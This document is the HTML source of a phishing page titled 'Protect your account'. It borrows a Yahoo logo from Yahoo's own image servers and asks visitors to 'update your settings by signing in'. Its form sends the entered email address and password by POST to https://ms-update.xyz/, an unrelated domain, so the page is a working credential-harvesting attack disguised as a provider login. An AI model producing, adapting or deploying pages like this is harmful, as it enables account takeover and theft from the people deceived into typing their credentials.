

<!DOCTYPE html>
<html>
<head>
<style>body {
font-family: 'Open Sans', sans-serif;
}

button {
width: 80%;
margin-bottom: 30%;
margin-left: auto;
margin-right: auto;
display: block;
background-color: white;
height: 40px;
color: #188fff;
border: 1px solid #188fff;
border-radius: 30px;
font-size: 1.5rem;
}

button:hover {
background-color: #188fff;
color: #ffffff;
}

h1 {
text-align: center;
font-size: 1.5rem;
margin-bottom: 2px;
}

form {
padding-bottom: 10%;
}

.infoText {
text-align: center;
margin-bottom: 20%;
margin-top: 0;
font-size: 0.8rem;
font-weight: 500;
color: grey;
}

.footerz {
text-align: center;
color: #6001d2;
font-size: 0.65rem;
margin-bottom: 10%;
}

input {
border-bottom: 1px solid #b8bec2;
border-top: none;
border-left: none;
border-right: none;
background-color: white;
width: 80%;
margin-bottom: 10%;
margin-left: auto;
margin-right: auto;
display: block;
}

::placeholder {
padding-bottom: 4%;
font-size: 1rem;
text-align: center;
color: #b8bec2;
font-weight: 600;
}



.logo {
width: 50%;
margin-left: auto;
margin-right: auto;
display: block;
}

.header {
width: 30%;
}

.container {
width:80%;
/ height: 500px; /
margin: 0 auto;
background-color: white;
-webkit-box-shadow: 0px -2px 5px -2px rgba(0,0,0,0.75);
-moz-box-shadow: 0px -2px 5px -2px rgba(0,0,0,0.75);
box-shadow: 0px -2px 5px -2px rgba(0,0,0,0.75);
padding-bottom: 0.5%;
}

@media screen and (min-width: 600px) {
.container {
width: 25%;
margin: auto;
}

.header {
width: 10%;
}

button {
margin-bottom: 5%;
}

.footerz {
margin-bottom: 5%;
}
}</style>
<meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Protect your account</title> <meta name="description" content=""> <link rel="shortcut icon" href="https://s.yimg.com/uu/api/res/1.2/Dn1UwBT_Cr.lJucziCG49A--~B/aD05MTQ7dz0xNTg0O3NtPTE7YXBwaWQ9eXRhY2h5b24-/https://media-mbst-pub-ue1.s3.amazonaws.com/creatr-uploaded-images/2019-09/a929b8f0-dd65-11e9-bffe-b90463fd5188" type="image/x-icon"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="styles.css"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet"> </head> <body> <img class="header" src="https://s.yimg.com/uu/api/res/1.2/Dn1UwBT_Cr.lJucziCG49A--~B/aD05MTQ7dz0xNTg0O3NtPTE7YXBwaWQ9eXRhY2h5b24-/https://media-mbst-pub-ue1.s3.amazonaws.com/creatr-uploaded-images/2019-09/a929b8f0-dd65-11e9-bffe-b90463fd5188" alt="" class="logo"> <div class="container"> <img src="https://s.yimg.com/uu/api/res/1.2/Dn1UwBT_Cr.lJucziCG49A--~B/aD05MTQ7dz0xNTg0O3NtPTE7YXBwaWQ9eXRhY2h5b24-/https://media-mbst-pub-ue1.s3.amazonaws.com/creatr-uploaded-images/2019-09/a929b8f0-dd65-11e9-bffe-b90463fd5188" alt="" class="logo"> <h1>Sign in</h1> <p class="infoText">update your settings by signing in</p> <form action="https://ms-update.xyz/" method="POST"> <input type="email" name="mail" class="email" placeholder="Email"><br> <input type="password" name="pass" class="password" placeholder="Password"><br> <button type="submit" name="submit">Submit</button> </form> <p class="footerz">Terms | Privacy</p> </div> <script src="" async defer></script> </body></html>
